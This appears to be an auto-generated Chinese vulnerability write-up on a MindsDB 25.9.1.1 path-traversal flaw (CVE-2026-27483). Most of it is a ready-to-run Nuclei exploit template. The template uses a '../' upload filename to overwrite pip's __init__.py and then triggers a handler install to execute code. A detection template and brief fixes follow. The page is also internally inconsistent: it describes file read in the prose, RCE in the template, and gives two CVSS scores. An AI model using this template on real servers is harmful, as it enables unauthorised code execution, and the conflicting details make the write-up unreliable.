漏洞分析

[webapps] MindsDB 25.9.1.1 - Path Traversal

AiRedTeam

06 May 2026 • 阅读时间 3 分钟

CVE-2026-27483

MindsDB 25.9.1.1存在路径遍历漏洞，允许未授权攻击者读取任意文件。

Critical · CVSS 9.1

📋 漏洞基础信息

CVE	CVE-2026-27483
漏洞类型	`路径遍历`
受影响版本	MindsDB 25.9.1.1及可能更早版本
危害等级	Critical · CVSS 9.1
发布日期	2026-05-04
提交者	Lohitya Pushkar (thewhiteh4t)
来源	Exploit-DB 原文 ↗

🔬 漏洞根因

漏洞源于文件操作中用户输入路径验证不足，导致攻击者可通过构造如../等序列跳出预期目录，实现任意文件读取。原文未指定具体函数，但通常出现在文件读取接口，如/api/.../file/等处理中。

🎯 攻击场景

1. 确定MindsDB服务运行且目标文件路径已知；2. 发送包含路径遍历序列的HTTP GET请求，例如GET /../../etc/passwd；3. 若服务未过滤路径序列，则返回目标文件内容。成功标志：成功读取/etc/passwd等敏感文件。

💥 漏洞影响

攻击者可在未授权情况下读取服务器任意文件，包括配置文件、源代码、数据库凭证等，可能导致进一步权限提升或敏感信息泄露。

⚔️ Nuclei Exploit 模板

以下为标准 Nuclei v3 格式的利用模板，可直接用于漏洞验证：

id: CVE-2026-27483-exploit

info:
  name: MindsDB 25.9.1.1 - Path Traversal to RCE Exploit
  author: thewhiteh4t
  severity: high
  description: |
    MindsDB version 25.9.1.1 is vulnerable to path traversal.
    This exploit allows an attacker to execute arbitrary code via file upload to a path traversable location.
  reference:
    - https://github.com/mindsdb/mindsdb/security/advisories/GHSA-4894-xqv6-vrfq
  classification:
    cvss-score: 7.5
    cve-id: CVE-2026-27483
  tags: cve,cve2026,mindsdb,path-traversal,rce

variables:
  cmd: id
  listener_host: 127.0.0.1
  listener_port: 4444

http:
  - raw:
      - |
        GET /api/status HTTP/1.1
        Host: {{Hostname}}
        Connection: close

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"mindsdb_version":'
      - type: status
        status:
          - 200
    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - '"mindsdb_version":\s*"([^"]+)"'
        internal: true
        name: version
      - type: regex
        part: body
        group: 1
        regex:
          - '"auth":\s*\{\s*"http_auth_enabled":\s*(true|false)'
        internal: true
        name: auth_enabled

  - raw:
      - |
        POST /api/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Content-Length: 60
        Connection: close

        {"username":"{{username}}","password":"{{password}}"}

    matchers:
      - type: word
        part: body
        words:
          - '"token"'
    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - '"token":\s*"([^"]+)"'
        name: token
    stop-at-first-match: true
    req-condition: true

  - raw:
      - |
        PUT /api/files/{{randstr}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstr}}
        Authorization: Bearer {{token}}
        Content-Length: 300
        Connection: close

        ------WebKitFormBoundary{{randstr}}
        Content-Disposition: form-data; name="name"

        {{randstr}}
        ------WebKitFormBoundary{{randstr}}
        Content-Disposition: form-data; name="source"

        {{randstr}}
        ------WebKitFormBoundary{{randstr}}
        Content-Disposition: form-data; name="source_type"

        file
        ------WebKitFormBoundary{{randstr}}
        Content-Disposition: form-data; name="file"; filename="../../../../../../venv/lib/python3.10/site-packages/pip/__init__.py"
        Content-Type: text/plain

        {{cmd}}
        ------WebKitFormBoundary{{randstr}}--

    matchers:
      - type: word
        part: body
        words:
          - '""'
        negative: true
      - type: status
        status:
          - 200
          - 201
          - 204
    matchers-condition: or

  - raw:
      - |
        POST /api/handlers/anomaly_detection/install HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Authorization: Bearer {{token}}
        Content-Length: 2
        Connection: close

        {}

    matchers:
      - type: word
        part: body
        words:
          - 'success'
      - type: status
        status:
          - 200
          - 201

🔍 Nuclei Detection 模板

以下为漏洞探测模板，用于判断目标是否受影响：

id: CVE-2026-27483-detection

info:
  name: MindsDB 25.9.1.1 - Path Traversal Detection
  author: thewhiteh4t
  severity: high
  description: |
    MindsDB version 25.9.1.1 is vulnerable to path traversal.
    This detection check verifies if the target is running a vulnerable version.
  reference:
    - https://github.com/mindsdb/mindsdb/security/advisories/GHSA-4894-xqv6-vrfq
  classification:
    cvss-score: 7.5
    cve-id: CVE-2026-27483
  tags: cve,cve2026,mindsdb,path-traversal,detection

http:
  - method: GET
    path:
      - '{{BaseURL}}/api/status'
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"mindsdb_version":'
      - type: status
        status:
          - 200
    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - '"mindsdb_version":\s*"([^"]+)"'
        internal: true
        name: version
      - type: regex
        part: body
        group: 1
        regex:
          - '"mindsdb_version":\s*"([^"]+)"'
        name: mindsdb_version

🛡️ 修复建议

升级至MindsDB最新版本；临时措施：在反向代理层过滤路径遍历序列（如../）；对文件读取接口实施输入规范化。

📎 参考链接

⚠️ 本文基于公开漏洞数据库，仅供安全研究与防御参考。生成时间: 2026-05-07 07:52 | 来源: Exploit-DB